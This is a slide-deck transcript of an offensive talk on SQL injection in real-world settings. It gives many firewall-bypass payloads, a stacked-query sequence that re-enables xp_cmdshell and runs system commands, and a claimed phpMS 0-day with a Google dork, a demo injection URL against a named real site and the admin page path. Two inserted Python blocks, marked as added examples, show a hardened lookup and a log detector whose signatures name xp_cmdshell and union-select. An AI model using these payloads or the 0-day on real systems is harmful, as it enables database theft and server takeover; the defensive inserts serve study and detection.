SQL INJECTIONS WITH REAL LIFE SCENARIOS By Francis Alexander


Post on 21-Aug-2015


WHO AM I?

• Got listed on the eBay and Microsoft security researchers lists

• Worked as a freelance security researcher for tech2.in.com and in.com

• Found SQLi vulnerabilities in the Kerala entrance portal website

• http://tech2.in.com/news/general/updated-serious-vulnerability-affects-kerala-common-entrance-exams-portal/369982

• Basically the InfoSec Researcher Guy

AGENDA

Strictly WAF-based and real-life scenarios

MSSQL stacked queries (thought of it as a good add-on)

A PHP-MS 0-DAY

SQLI: AN INTRO

• First among the OWASP Top 10 vulnerabilities
• Used for gaining access to the SQL database and hence the b0x

Mainly of 5 types:

• Union based
• Error based
• X-path based
• Blind and time based
• Double query based

PENTESTING SQLI IN THE REAL WORLD

• So what's the catch here?
• Pentesting real-life scenarios is more difficult than ever
• SQLi has been patched, and firewalls, IDS and IPS are installed everywhere
• Exploiting SQLi has become difficult, and the tools have disappointed too!

WHAT HAS KEPT US DULL

• Of course, the failure of sqlmap!
• The failure of Havij, which by the way is always a failure :p
• IDS, IPS and the rest of the firewall family
• Apache security modules: mod_sec, htmlentities, mysql_escape, magic_quotes and all my dear appsec modules

ADVANCED WAF BYPASSING TECHNIQUES

• What are they?
• Well, we need to overcome the situation that has come up rather than sit and lament over it
• Here we will be focusing on the real-life scenarios where the tools fail and much of our human hard work comes in

BYPASSING FILTERS

• preg_match is a comparer statement used in PHP
• Mainly deployed by small-scale WAFs
• Poorly coded ones are the easier; an example

SQLI USING STORED PARAMETERS

• Used when "select" + any case letters are blocked: 'select'+'(A-Za-z)'
• So any letter after select gets filtered out

Solution

• MySQL has an option called stored variable procedure
• "@" is a sign that can be used as a prefix; it denotes stored procedure and function parameter names, and variable names.

So how do we do it?

• Union select 1,2,3 - - = 403 Forbidden
• So it changes to: and (@:=version()) union select 1,@,3- - = bypassed

WHERE HAS THE ID=? DISAPPEARED

• So what's the catch here?
• Most of us love the dork inurl:php?id= site:blah.com
• So what has happened: most admins have moved the id= parameter to within the URL, making the tools go reckless and n00bs go mad
• An example: the usual way was site.com/index.php?id= ; now they have gone on and changed it to site.com/index-goods-12.html
• An example site that has no point of injection at first sight

Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-suis-prete,884.html
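Why a rewritten URL such as index-goods-12.html is still an injection point, shown with the vulnerable lookup beside a hardened one. This is an added example, not code from the talk: the route patterns, table and function names are assumptions, and sqlite3 stands in for the site's database.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory catalogue standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE goods (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO goods VALUES (?, ?, ?)",
                   [(12, "lamp", 30), (13, "desk", 90)])
    return db

# Hypothetical rewrite rules: the id now lives in the path, not in ?id=
LOOSE_ROUTE = re.compile(r"/index-goods-(.+)\.html")        # accepts anything as the id
STRICT_ROUTE = re.compile(r"/index-goods-(\d{1,9})\.html")  # digits only

def lookup_vulnerable(db, path):
    """Before: the rewritten URL segment is pasted into the SQL text."""
    raw = LOOSE_ROUTE.fullmatch(path).group(1)
    return db.execute(f"SELECT id, name, price FROM goods WHERE id={raw}").fetchall()

def lookup_hardened(db, path):
    """After: reject non-numeric ids at the route, then bind the value."""
    match = STRICT_ROUTE.fullmatch(path)
    if match is None:
        return None                      # caller answers 404, no query is built
    return db.execute("SELECT id, name, price FROM goods WHERE id=?",
                      (int(match.group(1)),)).fetchall()

# Constructed request paths; the second reuses the marker values from the slides.
NORMAL = "/index-goods-12.html"
TAMPERED = "/index-goods-0/**/union/**/select/**/1111,2222,3333.html"
```

Hiding the parameter in the path changes nothing about the query; the strict route plus the bound parameter is what removes the injection point.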

A FEW POINTS TO PONDER

• The usual commenting style should be followed here, i.e. the "- -"; otherwise other forms like %23 (#) and /* could cause the browser to misinterpret the statement as a comment, hence commenting out the rest and not letting it read the .html part
• In most cases encountered with this type of injection there are white spaces, which often cause havoc and are a nightmare for scanners

MESSING UP WITH WHITE SPACES

• Well, dealing with white spaces depends on different scenarios
• You could use the traditional commenting style, like id=3/**/union/**/select 1,2,3
• The problem is that /**/ might be filtered in some cases
• So we use the (), which is the same as executing the query: id=(2)union(select(1),2,3)
• NB: During HTML-based injections it is better to use the parentheses

SQLI IN HTML TAGS

• Based on Error 1222
• Came across CTFs where the answer had to be in normal union based.
• Most tools fail here since the vulnerable column is being parsed in between the HTML tags.
• Usually union statements are provided here, but the columns do not get displayed.
• So what do we do? Please don't say we look over the source, because you're not going to find anything at the first shot
• We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333
• This helps us to search in the source, but it is still not available on screen.
• If you would like to display it on screen, you could use the concat or group_concat functions with HTML inside them
• Use the hex of the HTML if the quotes are blocked due to magic quotes
• Here we could see the version on closing the "</title>" tag, since the vulnerable column was being displayed within the title block

BYPASSING SOME COMMON ERRORS

• Bypassing errors 400/403/404/406: //convert(group_concat(schema_name) using ascii) from information_schema.schemata - -

• C-style commenting: /*!Union*/+/*!Select*/ // apart from the original source commenting, the ! executes the command

• Character encoding: bypasses filters like 400: %55nion/**/%53elect

• Sub queries: Union (select 1,2,3) // where most WAFs fail out

• id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a // # is a comment, but the %0A bypasses with the new line, so the statements get executed

• Bypassing Error 1064: usually related to blocking of white spaces: id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0)) // the queries are supplied in parentheses so as to avoid the use of white spaces; "/**/" commenting is also possible

• Bypassing Error 500: and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+ // WAFs that are written in the C language are prone to overflow or act differently when loaded with a bunch of data. Giving a large amount of data allows our code to execute

INTRO TO MSSQL STACKED QUERIES

• Stacked queries are mainly available in MSSQL and PostgreSQL servers
• The underlying process is simple: if the cmdshell option is enabled, then you are in
• Stacked query support is checked on the server using 'WAITFOR DELAY hour:min:sec'
• For ex: EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-- - would check whether cmdshell is enabled or not, depending upon the time lag.

RE-ENABLING XP_CMDSHELL IN CASE IT'S DEAD?

http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show advanced options', 1-- -

http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -

http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-- -

http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
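How a defender can spot the request shapes from the filter-bypass slides and the stacked-query slides in web logs: normalize the request target first, then match. This is an added example, not code from the talk; the signature names, log layout and sample lines are constructed, with request targets reusing strings shown on the slides.

```python
import re
from urllib.parse import unquote

# Signatures are matched against the normalized request target only.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "sp_configure": re.compile(r"\bsp_configure\b"),
    "waitfor-delay": re.compile(r"\bwaitfor\s+delay\b"),
}

def normalize(target):
    """Undo the encodings and separators described in the slides."""
    text = target.replace("+", " ")          # '+' means space in a query string
    for _ in range(3):                       # bounded, covers double URL-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)  # /*!Union*/ executes
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)            # /**/ acts as a space
    text = re.sub(r"#[^\n]*", " ", text)     # MySQL '#' comment ends at the newline
    text = re.sub(r"[()]", " ", text)        # parentheses standing in for spaces
    return re.sub(r"\s+", " ", text).lower().strip()

def detect(target):
    norm = normalize(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(norm))

# Constructed access-log lines; the request targets reuse strings from the slides.
SAMPLE_LOG = [
    '203.0.113.7 "GET /index.php?id=12 HTTP/1.1" 200',
    '203.0.113.7 "GET /search.php?q=student+union+selection HTTP/1.1" 200',
    '203.0.113.9 "GET /index.php?id=3/**/%55nion/**/%53elect+1,2,3 HTTP/1.1" 403',
    '203.0.113.9 "GET /index.php?id=(2)union(select(1),2,3) HTTP/1.1" 200',
    '203.0.113.9 "GET /index.php?id=-1+%231q%0Aunion+all%23qa%0A%23%0Aselect+1,2,3 HTTP/1.1" 200',
    '203.0.113.9 "GET /index.php?id=1+/*!Union*/+/*!Select*/+1,2,3 HTTP/1.1" 200',
    "203.0.113.9 \"GET /security.asp?vulnID=123;%20EXEC%20sp_configure%20'xp_cmdshell',%201--%20- HTTP/1.1\" 200",
]

def scan(log_lines):
    """Return (line_number, signatures) for every line with at least one hit."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        found = detect(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits
```

Matching on the raw line would miss every tampered sample except the last; matching after normalization flags lines 3 to 7 and leaves the two benign requests alone.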

THE SITE CHECKED FOR PRIMARY ERRORS USING THE TRADITIONAL UNION SELECT STATEMENTS

Just to prove that this still exists: a real-life demo

QUERY PARTY

http://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));--

// Creates the table funkyfresh

http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -

// We declare a variable @funky and store in it the hex equivalent of the code. NOTE: 0x77686f616d69 => 'whoami'

/!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)))

// Credits to Bernardo's original write-up from BlackHat

// The reason I took it: although a bit complicated, it works for no reason seamlessly

Read the temp table to get the results, and you need to make sure you deal with the same data type when you do...

PHP-MS EXPLOIT 0-DAY

• 0-day by me
• phpMS - a free CMS (content management system), designed for rapid development and support of web projects of any complexity.
• Features of CMS phpMS: easy to install; multi-level menus; arbitrary arrangement of blocks; simple module development; access rights

#GOOGLE DORK: INTEXT:COPYRIGHT©2005 PHPMS

Demo http://http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--

#By default 6 columns are seen in most cases, so this could be used as the default in sites discovered

#Finding the admin page of this makes it very easy to exploit

#Default admin page is admin.php :-) Eg: http://www.site.com/admin.php :)

ANY QUESTIONS ?

References

• Couple of Blackhat talks and papers
• kaotickreations.blogspot.in (my blog)
• http://websec.wordpress.com/tag/sql-filter-evasion/